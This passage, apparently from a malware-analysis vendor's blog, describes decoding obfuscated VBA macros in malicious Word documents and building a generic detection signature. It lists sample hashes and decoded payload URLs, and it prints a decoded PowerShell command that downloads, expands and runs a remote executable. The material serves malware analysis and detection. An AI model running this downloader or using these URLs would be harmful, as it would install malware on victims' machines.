Print #Kasdwq, "c:\Windows\Temp\444.exe"


Print #FileNumber, "strRT = "http://www.asivamosensalud.org/images/log.jpg""

Print #FileNumber, "statRT = "http://savepic.su/5238122.png""

While the above example is a rather simple one, it still shows the basic principle and even includes a variable "constant propagation" kind of algorithm (see "URLLSK" and "STAA" in the "Before" code).


In Practice

Of course, we have been testing our new simplification algorithm and ran it against a few malicious Word documents, especially those that do not "trigger" (i.e. successfully start downloading files). The "non-triggering" samples are the most interesting, as those that execute successfully contain the alleged C2 URLs and IPs anyway. In the following, a few real-world examples with the corresponding malwr reports to underline that both systems did not trigger and/or show any network traffic.


Example 1

SHA256: 475aa057202c98a0eab161e1d073390b34312565f98efb6c527c01791805523b
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 2/57 (Sophos, TrendMicro) on 13/03/15, 19/57  on 14/03/15
Decoded URL: hxxp://


Example 2

SHA256: 9683b0eed6bdb1f16607a9cac5c72af2a69839bb591d5f8bfd3efc3963b292c0
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 1/57 (Ikarus) on 13/03/15, 23/57 on 14/03/15
Decoded URL: hxxp://accalamh.aspone.cz/js/bin.exe


Example 3

SHA256: 8e6bb148ffc0e18c0450a89f7b0ba729a28eb22da12fd3f69d18daa85fd09024
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 1/57 (CAT-QuickHeal) on 16/02/15, 35/57 on 14/03/15
Decoded URL: hxxp://

When you take a look at the Hybrid-Analysis reports running with the new VBA processing capabilities, then you will see extracted C2 URLs/IPs as a "Found URL in decoded VBA string" signature in the malicious section at the top of the report. This is how it looks:

Of course, the presented simplification will not always yield the desired result, especially when malware authors adapt and introduce more complicated obfuscation techniques. As always, it is a bit of a cat and mouse game. Thus, we will be observing samples being submitted and try to adapt, if we can and if it's necessary. The current version works, but it is at the same time also a "proof of concept" to underline that there's a lot of room for improvement.


In our opinion we can make at least the following conclusions:
  • static analysis in the context of malware analysis can be very important, if we are a little bit more intelligent about it
  • from the small AV benchmark (see VirusTotal results above): we can say that about 1/3 of AV vendors seem to react quite quickly to new threats within 24 hours and/or day(s), while about 2/3 of AV vendors seem to react within the first couple of weeks, but a lot of vendors seem to have issues if it's a zero-day Word document, although it would be possible to detect malicious characteristics using pure static analysi

Update: small "add-on" to the decoding technique presented above. We have been getting some samples that try to hide URLs and other interesting strings using a simple hex-encoded ASCII string. Here is a good example:


If we scroll down to the "Contains embedded VBA macros" and uncollapse the signature, then we can see the following VBA code:

The decoded String is actually:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://','%TEMP%\BKHkjgkKKJdf.cab'); expand %TEMP%\BKHkjgkKKJdf.cab %TEMP%\BKHkjgkKKJdf.exe; start %TEMP%\BKHkjgkKKJdf.exe;

Ouch! ;-)

We updated our algorithm to now also decode these kind of strings and forward them to the behavior signature interface (thereby triggering string related signatures and detecting the URL).


Contact us or learn more about VxStream Sandbox - Automated Malware Analysis.

Wednesday, February 25, 2015

Why Hybrid Analysis is not a marketing joke, but a useful technology

In 5 minutes you will know why Hybrid Analysis is useful - and not a marketing joke.

The case

As usual, we were checking reports uploaded to our malware analysis online service. Yesterday, we came by a report of sample* that is actually not that interesting, it is a typical dropper. The only significant aspect about the file at first sight is that it is relatively small (only ~14 KB) and tries to leave as little traces on the system as possible. Nevertheless, since everyone deserves a second chance, we decided to take a closer look and see if we couldn't find something that we could turn into a generic signature for malicious behavior. Generic signatures are great, because they apply to a broad variety of malware and obviously to new variants. We have seen a lot of samples that were uploaded, which were previously unknown to e.g. VirusTotal, but contained a lot of malicious behavior. Anyway, let's dive into the sample.

The first thing I always do is take a look at the signatures that matched. Then, I usually take a look at the network connections and process tree of analyzed processes. This obligatory check on the Hybrid Analysis section sometimes reveals quite interesting annotated disassembly listings (so called "Streams"). Since we can build signatures that fire on any kind of data found in the report, we come by some goodies from time to time.

Hybrid Analysis in action

The following screenshot is taken from the heuristically determined "most relevant" function found with the Hybrid Analysis engine:

We can see a typical pattern used by malware authors to "hide" strings from string-searching algorithms by building/concatenating a string character-by-character, often saving them in a local variable on the stack. This is quite an effective method, because the "final string" is concatenated at runtime so to speak and not lying in memory (i.e. even a process memory scan would not reveal the string, unless the stack/heap is snapshoted in just the right moment). Anyhow, usually these type of strings are API names and used for a GetProcAddress call to lookup the associated virtual address.

Turn it into something useful

The idea we had is the following: if we detect a lot (maybe more than 10) single characters being pushed onto the stack and a reference to GetProcAddress/LdrGetProcedureAddress in the same function/context, then we can assume someone is trying to hide a procedure name lookup from string scanning engines. So we whipped up a signature that does exactly that. Here it is after updating our online service and re-running the sample:

As we can see, there is enough indicators to make the decision that the behavior seen is malicious. This generic signature will fire on any sample uploaded to our service that contains the same or a similar trick. If you are interested in the signature code itself and how it was implemented, please get in touch through our contact form.

Final Notes

In this blogpost we learned that "Hybrid Analysis" (the combination of static analysis on memory dumps/binary files with dynamic runtime data/context information) can add valuable indicators that would have otherwise never been available. That is one of the reasons why VxStream Sandbox can extract more artifacts/indicators to trigger behavior signatures on than most other systems on the market. This does not mean we think our system is the perfect solution, but the underlying technology is solid and we believe that we are developing our software in the right direction.

The full report for this sample: https://www.hybrid-analysis.com/sample/342f9acdb9b89e963761fea283daccf0c7cacaf513a46fd09d9cc89223b9d978/

*SHA256: 342f9acdb9b89e963761fea283daccf0c7cacaf513a46fd09d9cc89223b9d978